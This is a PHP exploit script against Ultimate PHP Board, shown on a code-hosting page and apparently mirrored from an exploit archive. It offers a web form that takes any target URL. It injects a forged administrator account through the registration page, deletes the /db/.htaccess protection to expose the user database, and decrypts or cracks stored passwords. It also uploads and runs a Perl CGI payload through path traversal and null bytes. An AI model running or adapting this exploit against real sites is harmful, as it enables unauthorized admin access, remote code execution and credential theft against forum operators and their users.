PageRenderTime 47ms CodeModel.GetById 22ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/1932.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 347 lines | 71 code | 13 blank | 263 comment | 11 complexity | 91e81d5fd4702bd26510b6d7f2849dad MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php

    2. 

  2. /*

    3. 

  3. Advisory:

    4. 

  4. http://www.kliconsulting.com/users/mbrooks/UPBadvisory.rtf

    5. 

  5. Vendors site:

    6. 

  6. http://forum.myupb.com/

    7. 

  7. Download:

    8. 

  8. http://fileserv.myupb.com/download.php?url=upb196GOLD.zip

    9. 

  9. http://prdownloads.sourceforge.net/textmb/upb1.8.2.zip?download

    10. 

  10. Download Mirror:

    11. 

  11. http://www.kliconsulting.com/users/mbrooks/upb196GOLD.zip

    12. 

  12. http://www.kliconsulting.com/users/mbrooks/upb1.8.2.zip

    13. 

  13. */

    14. 

  14. //perl cgi code to inject into vulnerable system:

    15. 

  15. //payload should start with [NR] and end with #;

    16. 

  16. $perlPayload="[NR] use CGI qw(:standard);print header;print \" start \";print \" 0-day  \";print \" exploit \"; print \" code  end \";#";

    17. 

  17. 

    18. 

  18. $v1_xKey="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";

    19. 

  19. //taken from ./textdb.inc.php line 324:

    20. 

  20. 

    21. 

  21. function t_decrypt($text,$key){

    22. 

  22.     $crypt = "";

    23. 

  23.     for($i=0;$i<strlen($text);$i++)

    24. 

  24.     {

    25. 

  25.         $i_key = ord(substr($key, $i, 1));

    26. 

  26.         $i_text = ord(substr($text, $i, 1));

    27. 

  27.         $n_key = ord(substr($key, $i+1, 1));

    28. 

  28.         $i_crypt = $i_text + $n_key;

    29. 

  29.         $i_crypt = $i_crypt - $i_key;

    30. 

  30.         $crypt .= chr($i_crypt);

    31. 

  31.     }

    32. 

  32.     return $crypt;

    33. 

  33. }

    34. 

  34. 

    35. 

  35. 

    36. 

  36. function t_encrypt($text, $key)

    37. 

  37. {

    38. 

  38.     $crypt = "";

    39. 

  39.     for($i=0;$i<strlen($text);$i++)

    40. 

  40.     {

    41. 

  41. //	print $i."key char:".substr($key, $i, 1)."<br>";

    42. 

  42.         $i_key = ord(substr($key, $i, 1));

    43. 

  43.   //     print $i."ikey:".$i_key."<br>";

    44. 

  44. 	$i_text = ord(substr($text, $i, 1));

    45. 

  45. //	print $i."itext:".$i_text."<br>";

    46. 

  46.         $n_key = ord(substr($key, $i+1, 1));

    47. 

  47. //	print $i."nkey:".$n_key."<br>";

    48. 

  48. 	

    49. 

  49.         $i_crypt = $i_text + $i_key;

    50. 

  50. //	print  $i."T+K_crypt:".$i_crypt ."<br>";

    51. 

  51.         $i_crypt = $i_crypt - $n_key;

    52. 

  52. //	print $i."I-N_crypt:".$i_crypt."<br>";

    53. 

  53.         $crypt .= chr($i_crypt);

    54. 

  54. 

    55. 

  55. 	$offset0=$i_crypt-$i_text;

    56. 

  56. //	print "key=$i_key - $n_key<br>";

    57. 

  57. //	print "offset0:$offset0=$i_crypt-$i_text<br>";

    58. 

  58. 	$offset=$i_key-$n_key;

    59. 

  59. 	//print "offset:$offset<br>";

    60. 

  60. //	$broken=$i_text+$offset;

    61. 

  61. //	print "broken:".$broken;	

    62. 

  62. 

    63. 

  63.     }

    64. 

  64.     return $crypt;

    65. 

  65. }

    66. 

  66. 

    67. 

  67. function gen_collision($offset, $start){//$start should be a number of an ascii char

    68. 

  68.    $offset_len=strlen($offset);

    69. 

  69.    $x=0;

    70. 

  70.  //  print "len:".$offset_len."<br>";

    71. 

  71.   // for($x=0;$x<$offset_len;$x++){//$offset as $off_int){

    72. 

  72.   foreach($offset as $off_char){

    73. 

  73. 	if($x==0){

    74. 

  74. 		$newkey.=chr($start);

    75. 

  75. 		$nextchar=$start;

    76. 

  76. 		$x++;

    77. 

  77. 	}

    78. 

  78. //	print "next char: $nextchar "."offset:".$off_char."<br>";

    79. 

  79. 	$tmp=$nextchar - $off_char;

    80. 

  80. 	$newkey.=chr($tmp);

    81. 

  81. 	$nextchar=$tmp;

    82. 

  82.    }

    83. 

  83.    return $newkey;

    84. 

  84. }

    85. 

  85. 

    86. 

  86. function gen_offset($crypt,$text){

    87. 

  87. 	$text_len=strlen($text);

    88. 

  88. 	for($x=0;$x<$text_len;$x++){

    89. 

  89. //		print "crypt:".substr($crypt, $x, 1).'text:'.substr($text, $x, 1).'<br>';

    90. 

  90. 		$cry_hex=ord(substr($crypt, $x, 1));

    91. 

  91. 		$txt_hex=ord(substr($text, $x, 1));

    92. 

  92. 		$offset[$x]=$cry_hex - $txt_hex;

    93. 

  93. 		//print "offset".$offset."crypt".$cry_hex."text".$txt_hex[x]."<br>";

    94. 

  94. 	}

    95. 

  95. 	return $offset;//numeric array

    96. 

  96. }

    97. 

  97. 

    98. 

  98. 

    99. 

  99. function http_gpc_send( $method, $host, $port ,$usepath,$cookie="", $postdata = "") {

    100. 

  100.  $fp = pfsockopen( $host, $port, &$errno, &$errstr, 120 );

    101. 

  101.  # user-agent name

    102. 

  102.  $ua = "msnbot/1.0 (+http://search.msn.com/msnbot.htm)";

    103. 

  103. 

    104. 

  104.  if( !$fp ) {

    105. 

  105.     print "$errstr ($errno)<br>\nn";

    106. 

  106.  } else {

    107. 

  107.     if( $method == "GET" ) {

    108. 

  108.         fputs( $fp, "GET $usepath HTTP/1.0\n" );

    109. 

  109.     }

    110. 

  110.     else if( $method == "POST" ) {

    111. 

  111.         fputs( $fp, "POST $usepath HTTP/1.0\n" );

    112. 

  112.     }

    113. 

  113.     

    114. 

  114.     fputs( $fp, "User-Agent: ".$ua."\n" );

    115. 

  115.     fputs($fp, "Host: ".$host."\n");

    116. 

  116.     fputs( $fp, "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" );

    117. 

  117.     fputs( $fp, "Accept-Language: en-us,en;q=0.5\n" );

    118. 

  118.     fputs( $fp, "Accept-Encoding: gzip,deflate\n" );

    119. 

  119.     fputs( $fp, "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" );

    120. 

  120.     fputs( $fp, "Cookie: ".$cookie."\n" );

    121. 

  121.    

    122. 

  122.    if( $method == "POST" ) {

    123. 

  123. 	$strlength = strlen( $postdata );

    124. 

  124.         fputs( $fp, "Content-type: application/x-www-form-urlencoded\n" );

    125. 

  125.         fputs( $fp, "Content-length: ".$strlength."\n\n" );

    126. 

  126.         fputs( $fp, $postdata."\n\n");

    127. 

  127.     }

    128. 

  128.     fputs( $fp, "\n\n" );

    129. 

  129.     

    130. 

  130.    $output = "";

    131. 

  131.    while( !feof( $fp ) ) {

    132. 

  132.         $output .= fgets( $fp, 1024 );

    133. 

  133.    }

    134. 

  134.     fclose( $fp );

    135. 

  135.  }

    136. 

  136.  return $output;

    137. 

  137.  }

    138. 

  138. 

    139. 

  139. function getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env){

    140. 

  140.     $exp_power_env="3";//admin

    141. 

  141.     $InjectUserPost="u_login=te".rand()."1&u_email=rew".rand()."@wfje.com&u_loca=&u_site=&avatar=images%2Favatars%2Fnoavatar.gif&u_icq=&u_aim=&u_msn=&u_sig=s%3C%7E%3E0%3C%7E%3E2006-04-20%5BNR%5D".$exp_user_env."%3C%7E%3E".$exp_pass_env."%3C%7E%3E".$exp_power_env."%3C%7E%3EA%40a.com%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E1%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E13%3C%7E%3E%3C%7E%3E1%3C%7E%3E".$exp_id_env."&submit=Submit";

    142. 

  142.     http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost);

    143. 

  143. }

    144. 

  144. 

    145. 

  145. 

    146. 

  146. if(isset($_REQUEST['vict'])){

    147. 

  147.     $payName="data".rand().".cgi";//must be .cgi

    148. 

  148.     $expPost="u_name=Admin&subject=hey&icon=#!/usr/bin/perl -wT \"&message=$perlPayload&id=/../images/$payName%00";

    149. 

  149.     $exp_user_env="Jockie227";

    150. 

  150.     $exp_pass_env="tZbi}";

    151. 

  151.     $exp_power_env="3";

    152. 

  152.     $exp_id_env=4000000000+rand(0,300000000);

    153. 

  153.     //The script is injecting user into the database;  becase of this the cookie is known before the script even contacts the vulnerable "Ultamate PHP Boar".  Also note that a time stamp is not needed. 

    154. 

  154.     $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env";

    155. 

  155. 

    156. 

  156.     $url_parsed = parse_url($_REQUEST['vict']);

    157. 

  157.     if ( empty($url_parsed['scheme']) ) {

    158. 

  158.         $url_parsed = parse_url('http://'.$url);

    159. 

  159.     }

    160. 

  160.     $rtn['url'] = $url_parsed;

    161. 

  161.     $victPort = $url_parsed["port"];

    162. 

  162.     if ( !$port ) {

    163. 

  163.         $victPort = 80;

    164. 

  164.     }

    165. 

  165.     $victPath = $url_parsed["path"];

    166. 

  166.     $victHost = $url_parsed["host"];

    167. 

  167. 

    168. 

  168.     print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>";

    169. 

  169.     print "<CENTER><B><I>0-day</I></B></CENTER>";

    170. 

  170. 

    171. 

  171.     //injecting user into database,  this information is used to verify session information

    172. 

  172.     getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env);

    173. 

  173.   //http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost);

    174. 

  174. 

    175. 

  175.    // http_gpc_send("GET", $victHost, $victPort, $victPath."/open.php?id=../images%00", $cookie);

    176. 

  176. 

    177. 

  177.     //uploading CGI

    178. 

  178.     $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost);

    179. 

  179.     //making cgi executeable usei "close.php"

    180. 

  180.     http_gpc_send("GET", $victHost, $victPort, $victPath."/close.php?id=../images/".$payName."%00", $cookie);

    181. 

  181.     //executing cgi

    182. 

  182.     $feedBack=http_gpc_send("GET",$victHost, $victPort, $victPath."/images/".$payName);

    183. 

  183.     $field = str_replace("<", "&lt;", $field);

    184. 

  184.     $field = str_replace(">", "&gt;", $field);

    185. 

  185.    // print $field;

    186. 

  186.     print $feedBack;

    187. 

  187.     exit;

    188. 

  188. }elseif(isset($_REQUEST['victHTA'])){

    189. 

  189.     $expPost="u_name=#&message=#&id=/.htaccess%00";

    190. 

  190.     $exp_user_env="Jockie227";

    191. 

  191.     $exp_pass_env="tZbi}";

    192. 

  192.     $exp_power_env="3";

    193. 

  193.     $exp_id_env=4000000000+rand(0,300000000);

    194. 

  194.     //The script is injecting user into the database;  becase of this the cookie is known before the script even contacts the vulnerable Ultamate PHP Board.  Also note that a time stamp is not needed. 

    195. 

  195.     $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env";

    196. 

  196. 

    197. 

  197.     $url_parsed = parse_url($_REQUEST['victHTA']);

    198. 

  198.     if ( empty($url_parsed['scheme']) ) {

    199. 

  199.         $url_parsed = parse_url('http://'.$url);

    200. 

  200.     }

    201. 

  201.     $rtn['url'] = $url_parsed;

    202. 

  202.     $victPort = $url_parsed["port"];

    203. 

  203.     if ( !$port ) {

    204. 

  204.         $victPort = 80;

    205. 

  205.     }

    206. 

  206.     $victPath = $url_parsed["path"];

    207. 

  207.     $victHost = $url_parsed["host"];

    208. 

  208. 

    209. 

  209.     //injecting user into database,  this information is used to verify session information

    210. 

  210.     getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env);

    211. 

  211.     //

    212. 

  212.     $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost);

    213. 

  213.    // $field = str_replace("<", "&lt;", $field);

    214. 

  214.    // $field = str_replace(">", "&gt;", $field);

    215. 

  215.    // print $field;

    216. 

  216.    print "<script>window.location=\"".$_REQUEST['victHTA']."/db/\";</script>" ;

    217. 

  217.     exit;

    218. 

  218. }else if(isset($_REQUEST['addVict'])){

    219. 

  219.     $url_parsed = parse_url($_REQUEST['addVict']);

    220. 

  220.     if ( empty($url_parsed['scheme']) ) {

    221. 

  221.         $url_parsed = parse_url('http://'.$url);

    222. 

  222.     }

    223. 

  223.     $rtn['url'] = $url_parsed;

    224. 

  224.     $victPort = $url_parsed["port"];

    225. 

  225.     if ( !$port ) {

    226. 

  226.         $victPort = 80;

    227. 

  227.     }

    228. 

  228.     $victPath = $url_parsed["path"];

    229. 

  229.     $victHost = $url_parsed["host"];

    230. 

  230. 

    231. 

  231.     $exp_user_env=$_REQUEST["addName"];

    232. 

  232.     $exp_pass_env=t_encrypt($_REQUEST["addPass"],$v1_xKey);

    233. 

  233.     getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,4000000000+rand(0,300000000));

    234. 

  234.     print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>";

    235. 

  235.     print "<CENTER><B> Admin login Name:".$_REQUEST["addName"]."</B></CENTER>";//this exploit code suffers from xss!

    236. 

  236.     print "<CENTER><B> Admin login Password:".$_REQUEST["addPass"]."</B></CENTER>";

    237. 

  237.     exit;

    238. 

  238. }else if(isset($_REQUEST['decrypt'])){

    239. 

  239.     print "<I>ecrypted password:</I>";

    240. 

  240.     print "<CENTER>".$_REQUEST["decrypt"]."</CENTER>";

    241. 

  241.     print "<B>Decrypted password:</B>";

    242. 

  242.     print "<CENTER><B>".t_decrypt($_REQUEST["decrypt"],$v1_xKey)."</B></CENTER>";

    243. 

  243.     exit;

    244. 

  244. }else if(isset($_REQUEST['encrypt'])){

    245. 

  245.     print "<I>ecrypted password:</I>";

    246. 

  246.     print "<CENTER>".$_REQUEST["encrypt"]."</CENTER>";

    247. 

  247.     print "<B>Decrypted password:</B>";

    248. 

  248.     print "<CENTER><B>".t_encrypt($_REQUEST["encrypt"],$v1_xKey)."</B></CENTER>";

    249. 

  249.   //  print get_key(t_encrypt($_REQUEST["encrypt"],$v1_xKey),$_REQUEST["encrypt"]);

    250. 

  250.     exit;

    251. 

  251. }else if(isset($_REQUEST['cypher'])&&isset($_REQUEST['plain'])){

    252. 

  252. 	$cypher_len=strlen($_REQUEST['cypher']);

    253. 

  253. 	$offset=gen_offset($_REQUEST['cypher'],$_REQUEST['plain']);

    254. 

  254. 	print "Offset:";

    255. 

  255. 	for($x=0;$x<$cypher_len;$x++){

    256. 

  256. 		print  $offset[$x].':';

    257. 

  257. 	}

    258. 

  258. 	print '<br>';

    259. 

  259. 	$validKeys=0;

    260. 

  260. 	$y=0;

    261. 

  261. 	for($y=255;$y>=0;$y--){

    262. 

  262. 		$newKey[$y]=gen_collision($offset,$y);

    263. 

  263. 		$key_len=strlen($newKey[$y]);

    264. 

  264. 		print "<br>Key:$y  = ";

    265. 

  265. 		for($x=0;$x<=$key_len;$x++){

    266. 

  266. 			print  $newKey[$y][$x];

    267. 

  267. 		}			

    268. 

  268. 		print  "<br>Cypher:".t_encrypt($_REQUEST['plain'],$newKey[$y]);			

    269. 

  269. 		print "<br>Plain     :".t_decrypt($_REQUEST['cypher'],$newKey[$y])."<br><br>";

    270. 

  270. 	}

    271. 

  271. 	exit;

    272. 

  272. }

    273. 

  273. 

    274. 

  274. print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>

    275. 

  275.     

    276. 

  276.     <CENTER><B><I>0-day</I></B></CENTER>

    277. 

  277.      ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>

    278. 

  278.     <B><I>Get Admin</I></B><br>

    279. 

  279.     <B>Inject an administrative account into UPB:</B>

    280. 

  280.     <p>

    281. 

  281.     <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    282. 

  282.     <p>

    283. 

  283.     Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>

    284. 

  284.     <input name=\"addVict\" type=\"text\" size=60> <br>

    285. 

  285.     Inject Name:<br>

    286. 

  286.     <input name=\"addName\" type=\"text\" size=60> <br>

    287. 

  287.     Inject Password:<br>

    288. 

  288.     <input name=\"addPass\" type=\"text\" size=60> <br>

    289. 

  289.     <p>    

    290. 

  290.     <input type=\"submit\" value=\"Inject Admin\">     

    291. 

  291.     </form>

    292. 

  292.     

    293. 

  293.     <p>

    294. 

  294.     <B>PHP code injection is possilbe in the admin panel without an exploit.  Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: '  \";phpinfo(); \$crap=\"1  ' to any of the config values </B>( double quotes \" are only used in exploit)</B>

    295. 

  295.     <p>  

    296. 

  296.     ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>

    297. 

  297.     <B><I>Gain Read Access To The Database</I></B>

    298. 

  298. 

    299. 

  299.    <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    300. 

  300.     <p>

    301. 

  301.     Removes  /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB  [no trailing slash]) (user database in /db/users.dat) </i><br><br>

    302. 

  302.     <input name=\"victHTA\" type=\"text\" size=60> <br>

    303. 

  303.     <p>    

    304. 

  304.     <input type=\"submit\" value=\"Attack\">

    305. 

  305.     </form>    

    306. 

  306.     ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>

    307. 

  307.     <B><I>Crypto</I></B>  

    308. 

  308. 	

    309. 

  309.    <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    310. 

  310.     <p>

    311. 

  311.     Plain Text Password:<br>

    312. 

  312.     <input name=\"encrypt\" type=\"text\" size=60> <br>

    313. 

  313.     <p>    

    314. 

  314.     <input type=\"submit\" value=\"Encrypt\">     

    315. 

  315.     </form>

    316. 

  316.     <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    317. 

  317.     Encrypted Password:<br>

    318. 

  318.     <input name=\"decrypt\" type=\"text\" size=60> <br>

    319. 

  319.     <p>    

    320. 

  320.     <input type=\"submit\" value=\"Decrypt\">     

    321. 

  321.     </form>

    322. 

  322.     ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>  

    323. 

  323.     <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    324. 

  324.     <p>

    325. 

  325.     Plain Text:<br>

    326. 

  326.     <input name=\"plain\" type=\"text\" size=60> <br>

    327. 

  327.     <p>    

    328. 

  328.     corosponding cypher text:<br>

    329. 

  329.     <input name=\"cypher\" type=\"text\" size=60> <br>

    330. 

  330.     <p>    

    331. 

  331.     <input type=\"submit\" value=\"crack key\">     

    332. 

  332.     </form>

    333. 

  333.     ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>

    334. 

  334.    <B><I>Proof of Concept Only,  Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>

    335. 

  335.     <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> 

    336. 

  336.     <p>

    337. 

  337.      perl CGI Code Injection Attack Remote Target:<br>

    338. 

  338.     <input name=\"vict\" type=\"text\" size=60> <br>

    339. 

  339.     <p>    

    340. 

  340.     <input type=\"submit\" value=\"Attack\">

    341. 

  341.     </form>

    342. 

  342.     

    343. 

  343.     <B>http://www.domain.ext/PathToUPB  (no trailing slash)</B>

    344. 

  344.     </body>";

    345. 

  345. ?>

    346. 

  346. 

    347. 

  347. # milw0rm.com [2006-06-20]
    348.